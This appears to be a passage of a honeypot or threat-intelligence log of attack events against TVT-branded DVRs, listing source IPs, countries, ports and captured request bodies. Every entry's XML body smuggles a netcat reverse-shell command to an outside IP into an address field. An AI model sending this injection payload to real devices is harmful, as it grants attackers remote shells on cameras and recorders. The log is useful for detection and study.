- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T05:12:00Z",
- "last_seen": "2019-12-20T05:12:00Z"
- },
- {
- "source_ip_address": "154.66.193.206",
- "country": "ZA",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-20T05:06:29Z",
- "last_seen": "2019-12-20T05:06:29Z"
- },
- {
- "source_ip_address": "118.150.144.122",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T04:40:54Z",
- "last_seen": "2019-12-20T04:40:54Z"
- },
- {
- "source_ip_address": "218.161.25.58",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T04:13:53Z",
- "last_seen": "2019-12-20T04:13:53Z"
- },
- {
- "source_ip_address": "128.201.66.38",
- "country": "BR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T03:07:23Z",
- "last_seen": "2019-12-20T03:07:23Z"
- },
- {
- "source_ip_address": "91.240.134.122",
- "country": "PL",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T02:55:07Z",
- "last_seen": "2019-12-20T02:55:07Z"
- },
- {
- "source_ip_address": "37.142.240.13",
- "country": "IL",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 129,
- "first_seen": "2019-12-20T02:38:42Z",
- "last_seen": "2019-12-20T02:38:42Z"
- },
- {
- "source_ip_address": "80.31.205.28",
- "country": "ES",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-20T02:33:10Z",
- "last_seen": "2019-12-20T02:33:10Z"
- },
- {
- "source_ip_address": "212.57.19.186",
- "country": "TR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-20T02:32:12Z",
- "last_seen": "2019-12-20T02:32:12Z"
- },
- {
- "source_ip_address": "151.31.8.203",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-20T02:29:06Z",
- "last_seen": "2019-12-20T02:29:06Z"
- },
- {
- "source_ip_address": "114.33.220.99",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T02:17:36Z",
- "last_seen": "2019-12-20T02:17:36Z"
- },
- {
- "source_ip_address": "81.196.60.102",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-20T02:06:51Z",
- "last_seen": "2019-12-20T02:06:51Z"
- },
- {
- "source_ip_address": "201.130.185.24",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-20T01:54:59Z",
- "last_seen": "2019-12-20T01:54:59Z"
- },
- {
- "source_ip_address": "77.225.26.184",
- "country": "ES",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T01:45:10Z",
- "last_seen": "2019-12-20T01:45:10Z"
- },
- {
- "source_ip_address": "175.140.44.216",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 169,
- "first_seen": "2019-12-19T20:10:01Z",
- "last_seen": "2019-12-20T01:40:09Z"
- },
- {
- "source_ip_address": "188.130.240.116",
- "country": "RU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-20T01:38:08Z",
- "last_seen": "2019-12-20T01:38:08Z"
- },
- {
- "source_ip_address": "73.124.24.41",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-20T01:38:04Z",
- "last_seen": "2019-12-20T01:38:04Z"
- },
- {
- "source_ip_address": "59.127.98.9",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 135,
- "first_seen": "2019-12-20T01:31:33Z",
- "last_seen": "2019-12-20T01:31:33Z"
- },
- {
- "source_ip_address": "201.124.33.187",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T01:30:43Z",
- "last_seen": "2019-12-20T01:30:43Z"
- },
- {
- "source_ip_address": "220.130.170.139",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-20T01:24:21Z",
- "last_seen": "2019-12-20T01:24:21Z"
- },
- {
- "source_ip_address": "189.75.176.134",
- "country": "BR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T01:12:03Z",
- "last_seen": "2019-12-20T01:12:03Z"
- },
- {
- "source_ip_address": "114.34.112.7",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T01:11:49Z",
- "last_seen": "2019-12-20T01:11:49Z"
- },
- {
- "source_ip_address": "175.140.45.250",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T00:58:22Z",
- "last_seen": "2019-12-20T00:58:22Z"
- },
- {
- "source_ip_address": "219.92.140.31",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 139,
- "first_seen": "2019-12-20T00:58:08Z",
- "last_seen": "2019-12-20T00:58:08Z"
- },
- {
- "source_ip_address": "31.5.159.67",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 139,
- "first_seen": "2019-12-20T00:55:59Z",
- "last_seen": "2019-12-20T00:55:59Z"
- },
- {
- "source_ip_address": "187.145.115.96",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T00:49:33Z",
- "last_seen": "2019-12-20T00:49:33Z"
- },
- {
- "source_ip_address": "189.236.222.87",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 140,
- "first_seen": "2019-12-20T00:43:53Z",
- "last_seen": "2019-12-20T00:43:53Z"
- },
- {
- "source_ip_address": "42.188.39.156",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
